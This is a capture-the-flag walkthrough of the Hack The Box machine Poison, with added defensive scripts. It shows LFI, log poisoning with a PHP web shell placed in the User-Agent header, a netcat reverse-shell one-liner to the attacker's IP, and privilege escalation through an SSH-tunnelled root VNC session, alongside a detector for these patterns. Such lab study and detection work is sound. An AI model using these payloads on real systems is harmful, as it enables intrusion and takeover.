HTB Poison Walkthrough

Hadi AL Halbouni
5 min read · Mar 27, 2021

Poison is an interesting medium FreeBSD box. It runs a simple web page vulnerable to LFI; we leverage that LFI into log poisoning, which gives us RCE on the machine. We then SSH-tunnel port 5901, on which VNC runs locally as root, to our attacking machine, and use a secret file found on the server to authenticate to VNC as root.

We start with an Nmap scan to check for open ports and services:

nmap -sT -sV -sC 10.10.10.84
  • Port 22 (SSH) is open and runs OpenSSH 7.2
  • Port 80 (HTTP) is open and runs Apache 2.4.29

We navigate to http://10.10.10.84 in the browser and get a simple web app that includes and runs (tests) some PHP scripts.

Trying listfiles.php will give us

An array containing all the files that we can test for.

Typing pwdbackup.txt into the same input will give us the password for the user Charix, encoded 13 times in base64.

But we will not do the box this way: it is very easy, it is not a realistic real-life scenario, it is not the intended way of doing the box, and solving it this way would not benefit our learning process.

In the URL we see that there is a parameter named file, and it is used to include files into the page from different locations.
If we enter the name of a file that doesn't exist, we get an error that reveals the path Apache uses on disk.

We try LFI: I tried to read the /etc/passwd file and was able to read it, so now we know the machine is vulnerable to LFI.

Now we should try to read httpd.conf; if we manage to read it, it will show us the path to the log files.

The access logs are located in /var/log/httpd-access.log

The phpinfo output shows that allow_url_include is turned off, so we can rule out RFI.

Accessing the access.log file

Now let's try injecting PHP code into the logs (poisoning them) through the User-Agent header.

So we intercept the request in Burp and change the content of the User-Agent header to

<?php system($_REQUEST['cmd']); ?>

Now that the log is poisoned, we navigate to the access log file again and pass the cmd argument:

http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&cmd=ls -la

We got code execution on the server.
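From the defensive side, everything in the LFI and log-poisoning steps above leaves a trace in the very access log that gets poisoned: absolute paths or traversal in the file parameter, a PHP open tag inside a User-Agent string, and a request that includes a log file while also carrying a cmd parameter. The following script is an added example, not part of the original write-up or the box: it parses Apache combined-format lines (the regex is an assumption; adjust it if the server's LogFormat differs) and flags those patterns. The sample log lines are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" LogFormat; assumed here, adjust for the server's actual LogFormat.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A PHP open tag has no business in a User-Agent string.
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)
# Paths that look like a web-server log file (e.g. /var/log/httpd-access.log).
LOG_PATH_RE = re.compile(r"(^|/)(httpd|apache|access|error)[^/]*\.log$", re.IGNORECASE)

# Constructed sample log, modelled on the requests described in the walkthrough.
SAMPLE_LOG = """\
10.10.16.206 - - [27/Mar/2021:10:00:01 +0000] "GET /browse.php?file=/etc/passwd HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.10.16.206 - - [27/Mar/2021:10:00:05 +0000] "GET /browse.php?file=ini.php HTTP/1.1" 200 2048 "-" "<?php system($_REQUEST['cmd']); ?>"
10.10.16.206 - - [27/Mar/2021:10:00:09 +0000] "GET /browse.php?file=/var/log/httpd-access.log&cmd=ls%20-la HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
10.10.14.2 - - [27/Mar/2021:10:01:00 +0000] "GET /browse.php?file=listfiles.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""


def analyse_line(line):
    """Return (client_ip, [reasons]) for a parsed line, or None if it is not combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    if PHP_TAG_RE.search(m.group("ua")):
        reasons.append("php_tag_in_user_agent")
    # parse_qs percent-decodes the query once (cmd=ls%20-la -> "ls -la").
    params = parse_qs(urlsplit(m.group("target")).query)
    for f in params.get("file", []):
        if f.startswith("/") or "../" in f:
            reasons.append("absolute_or_traversal_file_param")
        if LOG_PATH_RE.search(f) and "cmd" in params:
            # Including a log file together with a cmd argument is the
            # execution step of log poisoning, not an ordinary page include.
            reasons.append("log_include_with_cmd")
    return m.group("ip"), reasons


def scan(lines):
    """Run analyse_line over an iterable of log lines; keep only flagged ones."""
    hits = []
    for n, line in enumerate(lines, start=1):
        result = analyse_line(line)
        if result is None:
            continue
        ip, reasons = result
        if reasons:
            hits.append({"line": n, "ip": ip, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(f"line {hit['line']} from {hit['ip']}: {', '.join(hit['reasons'])}")
```

The script reports the first three constructed lines and stays quiet on the fourth, which is a normal include of listfiles.php. In practice the same three reasons map to three controls worth having: restrict the file parameter to an allowlist of includable scripts, keep the web server's log directory unreadable by the PHP process, and alert on PHP tags in request headers.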

Now we listen on port 4444 using Netcat

On the victim machine that runs FreeBSD we use

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i |nc 10.10.16.206 4444 > /tmp/f

Escalating to user Charix:

Now we can read pwdbackup.txt, decode the password, and log in to the box as user Charix over SSH.

We copy the password into a file on our local machine named pass, then we run

pass=$(cat pass); for i in $(seq 1 13); do pass=$(echo $pass | tr -d ' ' | base64 -d); done; echo $pass

This will give us Charix!2#4%6&8(0
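The shell loop above works because each layer was produced by a base64 encoder that wraps its output in lines, so the whitespace has to be stripped before every decode. The Python below is an added example, not from the original post: it reproduces the fixed 13-round decode, and also generalises it to a layer count that is not known in advance, stopping when the data stops being valid base64 or stops being text. The secret and the layered file are constructed inline; the real pwdbackup.txt is not reproduced here.

```python
import base64
import binascii


def wrap76(text):
    """Insert a newline every 76 characters, like the `base64` CLI does."""
    return "\n".join(text[i:i + 76] for i in range(0, len(text), 76)) + "\n"


def encode_layers(secret, rounds):
    """Constructed stand-in for pwdbackup.txt: base64-encode `rounds` times, wrapping each layer."""
    data = secret
    for _ in range(rounds):
        data = wrap76(base64.b64encode(data).decode("ascii")).encode("ascii")
    return data.decode("ascii")


def decode_layers(blob, rounds):
    """Equivalent of the shell loop: drop whitespace, base64-decode, repeat `rounds` times."""
    data = blob.encode("ascii")
    for _ in range(rounds):
        cleaned = b"".join(data.split())          # same effect as tr -d ' ' plus newline removal
        data = base64.b64decode(cleaned, validate=True)
    return data


def _looks_like_text(data):
    return all(32 <= b < 127 or b in b"\r\n\t" for b in data)


def peel(blob, max_rounds=32):
    """Decode until the result is no longer valid base64 text. Returns (plaintext, layers_removed).

    Caveat: a final secret made only of base64-alphabet characters would be decoded one
    time too many; when the layer count is known (13 here), prefer decode_layers.
    """
    data = blob.encode("ascii")
    layers = 0
    while layers < max_rounds:
        candidate = b"".join(data.split())
        try:
            nxt = base64.b64decode(candidate, validate=True)
        except (binascii.Error, ValueError):
            break                                 # not base64 any more: we have reached the secret
        if not _looks_like_text(nxt):
            break                                 # decoded to binary junk: previous layer was the secret
        data, layers = nxt, layers + 1
    return data, layers


if __name__ == "__main__":
    layered = encode_layers(b"example-secret!", 13)   # constructed sample, 13 layers like the box
    print(decode_layers(layered, 13))
    print(peel(layered))
```

validate=True makes the decoder reject anything outside the base64 alphabet instead of silently discarding it, which is what turns "this is not base64 any more" into a clean stopping condition for peel.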

Now we can SSH to the box using these creds

In the home directory of the user Charix we can see a zip file, secret.zip. We unzip it, and when it asks for a password we enter Charix's password; the output is a binary file named secret.

Let's transfer the secret.zip to our machine using SCP

scp user@remoteMachineIP:/pathToTheFile PathToWhereWeCopyIt

scp charix@10.10.10.84:/home/charix/secret.zip .

We upload LinPEAS to the server from our local machine using Python's SimpleHTTPServer, and we run it.

Escalating to root:

Looking at the running processes, we can see that there is a VNC server running as root:

Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1

Let's break down the command:

  • -rfbauth /root/.vnc/passwd: the file used to authenticate users
  • -rfbport 5901: the port to connect to
  • -localhost: listen on the loopback interface only

Checking the network sockets, we can see VNC listening on ports 5801 and 5901.

Since VNC only listens on localhost, we tunnel port 5901 to our machine over SSH by running

ssh -L 5901:127.0.0.1:5901 charix@10.10.10.84

When we check the network connections on our machine, we see that we are listening locally on 5901, so the tunnel is up.

Now we connect to the machine using vncviewer, passing the secret file as the password file:

vncviewer 127.0.0.1:5901 -passwd secret

Written by Hadi AL Halbouni

Cybersecurity Analyst with a B.Sc in Software Engineering and 2 M.Sc degrees in Cybersecurity. Skilled in detection, response and passionate about red teaming
